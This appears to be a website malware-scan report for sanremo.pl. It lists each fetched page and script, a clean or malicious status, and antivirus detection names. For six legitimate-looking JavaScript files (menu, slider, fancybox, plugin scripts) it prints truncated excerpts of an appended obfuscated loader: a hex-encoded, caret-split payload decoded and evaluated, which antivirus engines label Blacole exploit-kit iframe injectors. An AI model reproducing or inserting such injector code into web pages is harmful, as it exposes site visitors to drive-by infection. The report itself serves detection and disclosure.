| Request | Server response | Status |
http://www.sanremo.pl/ | 200 OK
Content-Length: 9269
Content-Type: text/html | clean |
http://www.sanremo.pl/szablon/sanremo/js/jquery.js | 200 OK
Content-Length: 55774
Content-Type: application/javascript | clean |
http://www.sanremo.pl/szablon/sanremo/js/scripts.js | 200 OK
Content-Length: 5042
Content-Type: application/javascript | clean |
http://www.sanremo.pl/szablon/sanremo/menu.js | 200 OK
Content-Length: 11240
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function cambiascheda(idscheda) {
for (var i=0; i<4; i++){
document.getElementById('sottomenu_'+i).style.display='none';
}
document.getElementById(idscheda).style.display='block';
}
(function () { var id = '09
... 3054 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}Antivirus reports:- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod781.Trojan.8de7
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- VIPRE
- Trojan.JS.Redirector.mb (v)
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/wtyczka/jscript.js | 200 OK
Content-Length: 15941
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function flipBox(b){var a;if(document.images["b_"+b].src.indexOf("_on")==-1){a=document.images["b_"+b].src.replace("_off","_on");document.getElementById("box_"+b).style.display="none";if(document.getElementById("box_"+b+"_diff")){document.getElementById("box_"+b+"_diff").style.display="block"}document.images["b_"+b].src=a;disply="none";now=new Date();now.setTime(now.getTime()+1000*60*60*24*365);expire=(now.toGMTString());document.cookie="fusion_box_"+b+"="+escape(disply)+"; expires="+expire}else
... 3000 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}Antivirus reports:- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod11d.Trojan.2617
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/wtyczka/admin-msg.js | 200 OK
Content-Length: 10273
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) "use strict";
function closeDiv(){$("#close-message").fadeTo("slow",0.01,function(){$(this).slideUp("slow",function(){$(this).hide()})})}window.setTimeout("closeDiv();",2500);
(function () { var id = '09881'; var pptaq09 = document.crea
... 3031 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}Antivirus reports:- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod20d.Trojan.1f21
- Ikarus
- Trojan.JS.Script
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- Comodo
- TrojWare.JS.Agent.LE
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.D
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK
Content-Length: 91668
Content-Type: text/javascript | clean |
http://www.sanremo.pl/slider/slider.js | 200 OK
Content-Length: 0
Content-Type: application/javascript | clean |
http://www.sanremo.pl/slider/demo.js | 200 OK
Content-Length: 15048
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(function(){
$('#slider-one').movingBoxes({
startPanel : 2, width : 800, panelWidth : .45, buildNav : true,
fixedHeight : true, navFormatter : function(){ return "●"; } });
$('#slider-two').movingBoxes({
startPanel : 2, width : 800, panelWidth : .45, buildNav : false,
fixedHeight : true,
});
$('#slider-three').movingBoxes({
startPanel : 1, widt
... 3279 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}Antivirus reports:- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- VIPRE
- Trojan.JS.Redirector.mb (v)
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/fancybox-1.3.4/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK
Content-Length: 11377
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){function g(a){var b=a||window.event,i=[].slice.call(arguments,1),c=0,h=0,e=0;a=d.event.fix(b);a.type="mousewheel";if(a.wheelDelta)c=a.wheelDelta/120;if(a.detail)c=-a.detail/3;e=c;if(b.axis!==undefined&&b.axis===b.HORIZONTAL_AXIS){e=0;h=-1*c}if(b.wheelDeltaY!==undefined)e=b.wheelDeltaY/120;if(b.wheelDeltaX!==undefined)h=-1*b.wheelDeltaX/120;i.unshift(a,c,h,e);return d.event.handle.apply(this,i)}var f=["DOMMouseScroll","mousewheel"];d.event.special.mousewheel={setup:function()
... 3039 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}Antivirus reports:- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod820.Trojan.0b34
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- Comodo
- TrojWare.JS.Agent.LE
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- VIPRE
- Trojan.JS.Redirector.mb (v)
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/fancybox-1.3.4/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK
Content-Length: 19087
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.html('<p id
... 3090 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}Antivirus reports:- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- Script.Packed.IFrame.G
|
http://www.sanremo.pl/wtyczka/jscripts/tiny_mce/tiny_mce.js | 200 OK
Content-Length: 180300
Content-Type: application/javascript | clean |
http://www.sanremo.pl/index.html | 200 OK
Content-Length: 9269
Content-Type: text/html | clean |
http://www.sanremo.pl/wydarzenia.html | 200 OK
Content-Length: 7639
Content-Type: text/html | clean |
http://www.sanremo.pl/kontakt.html | 200 OK
Content-Length: 8167
Content-Type: text/html | clean |
